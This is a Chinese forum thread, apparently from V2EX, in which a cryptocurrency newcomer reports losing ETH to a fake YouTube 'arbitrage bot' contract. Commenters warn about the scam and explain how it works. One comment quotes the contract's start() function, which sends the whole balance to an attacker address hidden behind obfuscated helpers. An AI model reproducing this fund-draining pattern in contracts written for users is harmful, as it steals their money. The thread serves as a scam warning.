才接触了几天,看到了这个视频,一步一步按照视频流程操作 到了合同创建阶段,关联的小狐狸钱包提示合同创建失败,我就刷新了一次,然后就继续下一步了,根据提示在左下角的合同地址复制界面复制了地址,转入了资金,目前已经无法找回。 也联系了吕老师,无果,求助一下大家,这个应该如何处理,谢谢 ETH 代码已放在最后,各位给看下有无欺诈代码,谢谢
链接地址: https://www.youtube.com/watch?v=Urbcyu_vrHQ&t=124s 截图地址: https://meee.com.tw/EfJsEx0 https://meee.com.tw/lj1Mpnl https://meee.com.tw/kzQjshq ETH 代码地址: https://paste.myst.rs/raw/nrmvuk6t/7uju0igw
101
8620 2024-12-17 17:09:16 +08:00
不说别的了: https://g.co/gemini/share/1fb8323850d1
现在虽然不能说完全是 AI 时代,但是大语言模型在解释小片段代码上能力还是可以的,这个几乎就是换了名字的明抢。 交易链接显示是 0.7ETH ,算是交学费了,就算忍不住也可以从很小的数开始来着……可以看看能不能报交易所之类的地方,他们或许会关注这个账号的提取活动(目前还没有)。 |
102
xieweixing 2024-12-17 17:11:08 +08:00
吃一堑长一智吧,想当年我也是从小白一路过来的,什么质押挖矿,什么貔貅盘,多得很,慢慢接触你就知道了,币圈真的是黑暗森林,反正要你掏钱的留个心眼,别急着操作,多看多去搜一搜有没有坑,还有,别人想带你赚钱,你想想有没有这个可能,有钱赚人家为什么不自己赚,干嘛教你,想明白了就不容易掉坑了
|
103
sz065vHi2V1c6LKP 2024-12-17 17:16:22 +08:00
@LanhuaMa 建议在你的评论加上玩笑的说明,不然有人真按着这个地址转帐了有机会构成诈骗的。
|
104
Leeeeex PRO @HENQIGUAI 125 倍合约爆仓了 lz 只会以为是自己有问题,但是这个帖子发出来之前 lz 还不认为是吕老师的问题,下次还得踩进坑里。
|
105
zlo309618100 2024-12-17 17:26:45 +08:00
额...才入币圈就自建合约套利?
|
106
1622346252 2024-12-17 17:44:58 +08:00
@DiffView #98 好家伙,代码都一样
|
107
zhengxinhn 2024-12-17 17:53:29 +08:00
@gushu 这地址就不是一个合格的地址啊,能转进去不得了了
|
109
Memoriae 2024-12-17 18:17:41 +08:00
不能理解的是,调试智能合约不在测试环境上跑,也不小额在各种 EVM 上测试,直接到以太坊链上操作 = =
真正的 solidity 合约没这么多混淆操作的,etherscan 上随便看几个合约大概就明白了。 这地址居然有 61.68 万美元价值的币,在其他 EVM 网络上估计也是用同样的合约部署进行诈骗。 |
110
zqwonderboy OP @8620 #101 哎 明明也天天在用 chatGPT ,就没想到提前过一下代码。
|
111
zqwonderboy OP @Memoriae #109 看来已经很多人已经中标了
|
112
momo1pm 2024-12-17 18:28:59 +08:00 via Android
马上 2025 了,这样还能骗到
|
113
TAsdd 2024-12-17 20:21:15 +08:00
说实话兄弟,看这个视频评论区感觉都是刷的好评
|
114
TAsdd 2024-12-17 20:25:02 +08:00
|
115
lazyeo 2024-12-17 20:32:26 +08:00 via Android
大半年前刚接触的时候也看到一个类似的视频,当时想学习夹子机器人,不过教程用的是 bnb ,看完视频就去买了 3 个 bnb 打算实践一下,但最后又留了个心眼多搜了一下信息觉得是骗子没理
最后 bnb 放着没动涨了🤣🤣 |
116
zqwonderboy OP @TAsdd #114 现在一回看发现细思极恐
|
117
Perry 2024-12-17 20:35:55 +08:00 via iPhone
这个就像是以前教你冲 Q 币可以返 Q 币的诈骗,底下评论都是提前设计好的
|
118
windyskr 2024-12-17 20:44:04 +08:00
给你点铜币回血
|
119
hardto 2024-12-17 20:53:42 +08:00
gemini 1206 的结论是
这段代码表面上是一个 1inch 滑点机器人,但实际上它是一个资金盗窃合约。它的核心功能是将合约中的所有 ETH 发送到一个硬编码的地址(很可能是攻击者的地址)。合约中大量复杂的代码和迷惑性的命名都是为了掩盖其真实意图。 |
120
frankilla 2024-12-17 21:00:11 +08:00
「教你如何赚钱」
|
121
BoxChen 2024-12-17 21:06:12 +08:00
兄弟,你有没有联系方式 我是 x:@BoxMrChen ,想详细之道你的细节
|
122
hongyexiaoqing 2024-12-17 22:00:24 +08:00
已经帮你举报这个 youtube 用户
|
123
greygoo 2024-12-17 22:07:48 +08:00
这种视频都是假的,看上去他在视频里面教你东西,但是链接里面的代码都是恶意的!(这是关键,当你觉得是自己代码有问题就去复制他的代码,这就上钩了),没有什么代码比合约更快丢钱了。前几个月就看到很多 YouTube 上面的广告在疯狂推这些视频,再加上一些假评论真的做到了每天 500U+,但是不是你
|
124
greygoo 2024-12-17 22:11:14 +08:00
所以这个故事告诉我们,合同代码非常关键,不懂不要乱碰。
|
125
kneo 2024-12-17 22:39:03 +08:00
乐子人。发出来也算给大家一个教训了。
|
126
lizhenda 2024-12-17 22:46:04 +08:00
YouTube 这种视频真是缺德啊
|
127
AmazingEveryDay 2024-12-17 22:51:37 +08:00 via Android
学到了 致富新途径 赚了一百多万了这个宗桑
|
128
realpg PRO |
130
y1y1 2024-12-17 23:47:31 +08:00
今日首笑
|
131
Aaron01 2024-12-18 00:31:03 +08:00
看标题就感觉有点好笑兄弟,出师未捷身先死。。。
币圈大家不都说很乱吗,你怎么一上来就栽大跟头 |
132
ShadowPower 2024-12-18 02:53:44 +08:00 我觉得,这个帖子本身就是对于“大模型有什么用?是不是噱头?”这个问题最有力的回答
|
133
2xvaHoK2LGxQ29R5 2024-12-18 05:34:49 +08:00 via Android
function start() public payable {
address to = startExploration((fetchMempoolData())); address payable contracts = payable(to); contracts.transfer(getBa()); } 一键把💰转走 |
134
K2 PRO 目前在油管见到过的这类流动性套利的视频全部都是诈骗
|
135
hugebug 2024-12-18 08:47:00 +08:00
感觉吕老师是个 ai 啊
|
136
renmengkai 2024-12-18 09:08:34 +08:00
代码都不自己优化下就用吗?币圈开源的代码都写的比较屎,最少自己优化下吧
|
137
sch1111878 2024-12-18 09:14:03 +08:00
分析的好
那这个吕老师也真有趣 还有学习阶段应该用 test-network 比较好, 或者只用少量的资金 |
138
Yanlongli 2024-12-18 09:16:29 +08:00
是兄弟 v 我 50,万倍返利。月入百万不是梦。跟我一起操作,打开网上银行,输入账号:123456789,输入金额:987654321 输入密码:666666 ,只需等待 30 天,每天盈利五百万+。详情请查看: https://v2ex.com/t/1098150
|
139
sch1111878 2024-12-18 09:22:06 +08:00
|
140
BadReese 2024-12-18 09:24:28 +08:00
生活中知道不给陌生人转账。。
换了区块链倒都很爽快了 怪不得人家都说 web3 遍地是黄金 |
141
echoo00 2024-12-18 09:36:19 +08:00
才发现我也联系过一个类似的 UP 主,油管是叫 Crypto 加密大师兄,TG 叫小天的区块链,他视频里放出的代码是测试版的,我还在 TG 问他正式版的怎么获得,他说每个月 200U ,我就没理他了,还好这么贵我没理他,不然我也大概率被骗了,视频是这个: ,应该是一样的
|
142
marc2017 2024-12-18 09:45:47 +08:00
|
143
sjzjams 2024-12-18 09:49:51 +08:00
咋不用交易所啊
|
144
duolaamengv2 2024-12-18 09:51:04 +08:00
有赚钱的事情还要到处发教你?尤其是什么收费教你赚钱,他自己都赚的你的学费
|
145
JOJO10086 2024-12-18 09:57:19 +08:00
你也是太搞笑了,信陌生人带你赚钱
|
147
xiexiping 2024-12-18 10:13:30 +08:00
V 站也有教你赚钱的,搜一下哥飞,哈哈
|
148
leehaoze98 2024-12-18 10:33:42 +08:00
已举报视频看后续
|
149
Geon97 2024-12-18 10:34:00 +08:00
挺想入币圈的
|
150
chf007 2024-12-18 10:35:20 +08:00
- 人赚不到自已认知能力以外的钱
- 精明的骗子也会筛选用户的,它会设计一个很浅显的漏洞故意暴露出来,能看出来的,不是它的目标用户,看不出来的,一定被骗 - 人生 吃一堑长一智 的前提是一直(活到老学到老)提高自已的基础逻辑能力(比如正常天上不会掉馅饼,真掉馅饼了一定是有问题的),否则会不断的买教训 |
151
susucoolsama 2024-12-18 10:36:53 +08:00
说不定这个吕老师前面也是韭菜呢,韭菜黑化
|
152
FanGanXS 2024-12-18 10:53:20 +08:00
这一幕让我想起来 N 年以前在网上搜索到可以刷 Q 币或者点券的视频。套路大概就是:先向某一个不是自己的 QQ 号里充 xxx ,然后美曰其名说是会激活刷点券模式,接下来再往自己的 QQ 号里充 xxx 。
|
153
wolfydw 2024-12-18 11:02:05 +08:00
|
154
luzihang 2024-12-18 11:13:20 +08:00
cifi 教程赚你的学费,defi 教程直接盗币
|
155
madou 2024-12-18 11:18:51 +08:00
币圈怎么这么精彩
|
156
zqwonderboy OP @wolfydw #153 谢谢你的关心
|
157
zqwonderboy OP @chf007 #150 讲的正确,值得反复思考
|
158
zqwonderboy OP @8620 #101 好的 吃一堑长一智,其实自己一直在用币安和抹茶做小额合约交易,没有赚到多少。
|
159
kingcanfish 2024-12-18 15:51:22 +08:00
世界上还是好人多啊
|
160
z903221074 2024-12-18 16:23:30 +08:00
对标准中文名“合约”还能叫出“合同”,你这个水平玩毛线啊,给圈子抢着送钱挺好的,爱看,多来。
|
161
Alexc 2024-12-18 16:34:46 +08:00
两个核心函数 start()、withdrawal(),是把合约地址里的钱转到一个特定账户。
骗子没有在 fallback/receive 函数中调用这两个函数直接自动把钱转走,而是让用户手动去调用,哈哈哈,多此一举。 |
162
Alexc 2024-12-18 16:39:53 +08:00
|
163
zqwonderboy OP @ssssss6 #26 说的太中肯了,当时操作的时候凌晨 3 点了,也是想赚钱想瞎了心
|
164
zqwonderboy OP @windyskr #118 感谢老铁
|
165
zqwonderboy OP @BoxChen #121 感谢关注,我就是按照视频一步一步操作的,小狐狸钱包也是那会儿注册的
|
166
zqwonderboy OP @Aaron01 #131 都是教训😇
|
167
zqwonderboy OP @Yanlongli #138 兄台,我信了,卡号再发我一下🙃
|
168
zqwonderboy OP @z903221074 #160 请看标题,刚刚接触
|
169
sharpfang 2024-12-18 18:31:50 +08:00
@zqwonderboy 抹茶这种交易所也小心点吧...
|
170
pirredelu 2024-12-18 19:22:03 +08:00
币圈有句话,DO YOUR OWN RESEARCH ,自己研究明白才是真的入门之道
|
171
heider 2024-12-18 20:16:18 +08:00
啊,这学套利最基础的骗局了。。。。。。还不如看看我这个 https://www.bilibili.com/video/BV1xa411n7WU/ 起码能教你点真东西
|
172
chen05 2024-12-18 22:40:34 +08:00
fetchMempoolData()返回对方钱包地址
0x65c575b3035ac92C624427BBCA00A5118468fEc7 |
175
zmcity 2024-12-19 09:56:27 +08:00
这个代码笑死我了,withdrawal 还要再被骗一次
|
176
snowflake007 2024-12-19 10:20:00 +08:00
普通人还是别折腾这种了,大都是割韭菜的
|
177
milkpuff 2024-12-19 11:52:39 +08:00
币圈骗子相当之多。
另外提个醒,还有一种钓鱼网站,页面做的和官方页面一样,网址可能差几个字母,不注意看不出,进去就让你用钱包签名,签了钱就没了。进网站之前先仔细核对域名。 |
178
jetttt 2024-12-19 14:03:56 +08:00
@woooooOOOO #71 请问这个怎么看出来的
|
179
edwardzcn98 2024-12-19 14:24:24 +08:00
代码核心逻辑就是混淆地址-查询余额-直接转出,尼玛的人家后两个演都不带演,你就真转账啊。
GPT 都给你分析出来 fetchMempoolData 就包一层,encode 包一层,startExploration 再包一层,三层饺子就下锅了。 |
180
zqwonderboy OP @edwardzcn98 #179 错就错在没有在 GPT 问一下,知道被骗以后才问的,已经晚了
|
181
mS3FiDqq4392351 364 天前
就几千,当学费了,我姐被微信群里面推荐的加密货币钓鱼网站骗了十三万,她两年多白干了
|
182
zqwonderboy OP @mS3FiDqq4392351 #181 好的,谢谢,已经看开了 天下没有免费的午餐,当学费了
|